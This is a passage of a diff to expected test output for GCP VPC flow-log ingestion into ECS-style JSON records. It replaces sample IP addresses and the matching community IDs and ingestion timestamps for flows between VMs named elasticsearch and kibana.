019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391271600Z", + "original": "{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", "end": "2019-06-14T03:49:56.393651211Z", @@ -2148,17 +2148,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65320, "bytes": 70775, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 732 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:aNFZC/smfQa37MQsZfMmP5cD6PE=", + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", "bytes": 70775, "transport": "tcp", "type": "ipv4", @@ -2172,7 +2172,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -2197,8 +2197,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868486200Z", - "original": "{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391277200Z", + "original": "{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", "end": "2019-06-14T03:49:56.220714119Z", @@ -2225,18 +2225,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 281147, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:orgrC+fuNweNF7YN8VWuWIAnY80=", + "community_id": "1:6IVVaT8jMDNLIBHaC8OISRVYWS4=", "bytes": 281147, "name": "default", "transport": "tcp", @@ -2258,7 +2258,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -2295,8 +2295,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868489900Z", - "original": "{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391282700Z", + "original": "{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -2323,18 +2323,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33548, "bytes": 63590, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 340 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:komMvAI/1VsC7c9d9LuzM29I9NY=", + "community_id": "1:+S3/6PF+UXU7wlJD68HIrz0Mo6c=", "bytes": 63590, "name": "default", "transport": "tcp", @@ -2356,7 +2356,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -2393,8 +2393,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868493400Z", - "original": "{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391288500Z", + "original": "{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", "end": "2019-06-14T03:49:48.537763242Z", @@ -2415,9 +2415,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34836, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -2431,7 +2431,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LQLr5Clnxf10OYhT92IBepyH/y0=", + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -2446,7 +2446,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -2470,8 +2470,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868496700Z", - "original": "{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391292500Z", + "original": "{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", "end": "2019-06-14T03:48:39.076420731Z", @@ -2500,17 +2500,17 @@ "as": { "number": 45899 }, - "address": "192.0.2.165", + "address": "192.168.2.165", "port": 59623, "bytes": 1239, - "ip": "192.0.2.165", + "ip": "192.168.2.165", "packets": 18 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:n2izIhQ6f30pRxm58NLCxNXryuI=", + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", "bytes": 1239, "transport": "tcp", "type": "ipv4", @@ -2524,7 +2524,7 @@ }, "related": { "ip": [ - "192.0.2.165", + "192.168.2.165", "10.139.99.242" ] }, @@ -2549,8 +2549,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868500100Z", - "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391296900Z", + "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", "end": "2019-06-14T03:40:52.361155668Z", @@ -2571,10 +2571,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -2588,7 +2588,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:U8onVg/hApWe9WsWGFifAt6Xktg=", + "community_id": "1:VmSf9DDKsJGi5cMJABVFKp5r22M=", "bytes": 63853, "name": "default", "transport": "tcp", @@ -2611,7 +2611,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -2647,8 +2647,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868503400Z", - "original": "{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391301900Z", + "original": "{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", "end": "2019-06-14T03:49:55.213244028Z", @@ -2675,17 +2675,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33924, "bytes": 1458, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ji6ZJhSkwxeKiorTmyrgBE0/o+c=", + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -2699,7 +2699,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -2724,8 +2724,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868506900Z", - "original": "{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391306600Z", + "original": "{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634435179Z", "end": "2019-06-14T03:46:20.745658276Z", @@ -2746,10 +2746,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33534, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2763,7 +2763,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pYIEYHtraTMNgdi3XDEMGSH5LV4=", + "community_id": "1:kmu70zI5WDvD+rP/FihJUhIgim4=", "bytes": 252397, "name": "default", "transport": "tcp", @@ -2786,7 +2786,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -2822,8 +2822,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868510300Z", - "original": "{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391310300Z", + "original": 